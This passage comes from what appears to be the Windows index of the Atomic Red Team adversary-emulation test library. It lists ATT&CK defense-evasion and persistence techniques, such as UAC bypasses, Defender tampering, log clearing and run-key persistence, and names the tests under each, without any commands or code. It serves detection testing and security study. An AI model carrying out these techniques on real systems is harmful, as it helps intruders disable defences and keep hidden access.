- Atomic Test #3: Service Installation PowerShell [windows]
- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.004 Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- T1027.001 Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #10: Prevent Powershell History Logging [windows]
- Atomic Test #11: Clear Powershell History by Deleting History File [windows]
- [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
- Atomic Test #3: Clear Event Logs via VBA [windows]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- Atomic Test #2: Dynamic C# Compile [windows]
- [T1218.001 Compiled HTML File](../../T1218.001/T1218.001.md)
- Atomic Test #1: Compiled HTML Help Local Payload [windows]
- Atomic Test #2: Compiled HTML Help Remote Payload [windows]
- Atomic Test #3: Invoke CHM with default Shortcut Command Execution [windows]
- Atomic Test #4: Invoke CHM with InfoTech Storage Protocol Handler [windows]
- Atomic Test #5: Invoke CHM Simulate Double click [windows]
- Atomic Test #6: Invoke CHM with Script Engine and Help Topic [windows]
- Atomic Test #7: Invoke CHM Shortcut Command with ITS and Help Topic [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.002 Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- [T1006 Direct Volume Access](../../T1006/T1006.md)
- Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
- [T1562.002 Disable Windows Event Logging](../../T1562.002/T1562.002.md)
- Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #2: Kill Event Log Service Threads [windows]
- Atomic Test #3: Impair Windows Audit Log Policy [windows]
- Atomic Test #4: Clear Windows Audit Policy Config [windows]
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #2: Disable Microsoft Defender Firewall [windows]
- Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
- Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
- Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #10: Unload Sysmon Filter Driver [windows]
- Atomic Test #11: Uninstall Sysmon [windows]
- Atomic Test #12: AMSI Bypass - AMSI InitFailed [windows]
- Atomic Test #13: AMSI Bypass - Remove AMSI Provider Reg Key [windows]
- Atomic Test #14: Disable Arbitrary Security Windows Service [windows]
- Atomic Test #15: Tamper with Windows Defender ATP PowerShell [windows]
- Atomic Test #16: Tamper with Windows Defender Command Prompt [windows]
- Atomic Test #17: Tamper with Windows Defender Registry [windows]
- Atomic Test #18: Disable Microsoft Office Security Features [windows]
- Atomic Test #19: Remove Windows Defender Definition Files [windows]
- Atomic Test #20: Stop and Remove Arbitrary Security Windows Service [windows]
- Atomic Test #21: Uninstall Crowdstrike Falcon on Windows [windows]
- Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
- Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
- Atomic Test #9: Delete Prefetch File [windows]
- Atomic Test #10: Delete TeamViewer Log Files [windows]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
- [T1564.003 Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- [T1564 Hide Artifacts](../../T1564/T1564.md)
- Atomic Test #1: Extract binary files via VBA [windows]
- Atomic Test #2: Create a Hidden User Called "$" [windows]
- Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
- Atomic Test #1: Indicator Removal using FSUtil [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
- Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
- Atomic Test #3: Indirect Command Execution - conhost.exe [windows]
- [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #4: Install root CA on Windows [windows]
- Atomic Test #5: Install root CA on Windows with certutil [windows]
- [T1218.004 InstallUtil](../../T1218.004/T1218.004.md)
- Atomic Test #1: CheckIfInstallable method call [windows]
- Atomic Test #2: InstallHelper method call [windows]
- Atomic Test #3: InstallUtil class constructor method call [windows]
- Atomic Test #4: InstallUtil Install method call [windows]
- Atomic Test #5: InstallUtil Uninstall method call - /U variant [windows]
- Atomic Test #6: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant [windows]
- Atomic Test #7: InstallUtil HelpText method call [windows]
- Atomic Test #8: InstallUtil evasive invocation [windows]
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin priviliges [windows]
- [T1127.001 MSBuild](../../T1127.001/T1127.001.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
- Atomic Test #1: Mount ISO image [windows]
- Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
- [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
- Atomic Test #2: Creating W32Time similar named service using sc [windows]
- [T1036 Masquerading](../../T1036/T1036.md)
- Atomic Test #1: System File Copied to Unusual Location [windows]
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1112 Modify Registry](../../T1112/T1112.md)
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify registry to store logon credentials [windows]
- Atomic Test #4: Add domain to Trusted sites Zone [windows]
- Atomic Test #5: Javascript in registry [windows]
- Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
- [T1218.005 Mshta](../../T1218.005/T1218.005.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
- Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows]
- Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows]
- Atomic Test #6: Invoke HTML Application - Direct download from URI [windows]
- Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
- Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
- Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
- Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
- Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows]
- [T1564.004 NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
- [T1070.005 Network Share Connection Removal](../../T1070.005/T1070.005.md)
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
- Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
- Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
- [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- [T1216.001 PubPrn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.009 Regsvcs/Regasm](../../T1218.009/T1218.009.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
- [T1218.010 Regsvr32](../../T1218.010/T1218.010.md)
- Atomic Test #1: Regsvr32 local COM scriptlet execution [windows]
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- Atomic Test #4: Regsvr32 Registering Non DLL [windows]
- Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
- [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
- Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
- Atomic Test #6: Masquerading - non-windows exe running as windows exe [windows]
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- Atomic Test #9: File Extension Masquerading [windows]
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1207 Rogue Domain Controller](../../T1207/T1207.md)
- Atomic Test #1: DCShadow (Active Directory) [windows]
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
- Atomic Test #3: Rundll32 advpack.dll Execution [windows]
- Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #5: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #6: Rundll32 setupapi.dll Execution [windows]
- Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
- Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows]
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #4: InfDefaultInstall.exe .inf Execution [windows]
- Atomic Test #5: ProtocolHandler.exe Downloaded a Suspicious File [windows]
- Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
- Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
- T1027.002 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1221 Template Injection](../../T1221/T1221.md)
- Atomic Test #1: WINWORD Remote Template Injection [windows]
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- Atomic Test #8: Windows - Timestomp a File [windows]
- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1218.012 Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1222.001 Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
- Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #3: attrib - Remove read-only attribute [windows]
- Atomic Test #4: attrib - hide file [windows]
- Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
- [T1220 XSL Script Processing](../../T1220/T1220.md)
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
# persistence
- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows]
- [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
- Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1062 Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1136.001 Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #6: Create a new Windows admin user [windows]
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin priviliges [windows]
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1137 Office Application Startup](../../T1137/T1137.md)
- Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1137.002 Office Test](../../T1137.002/T1137.002.md)
- Atomic Test #1: Office Application Startup Test Persistence [windows]
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1034 Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
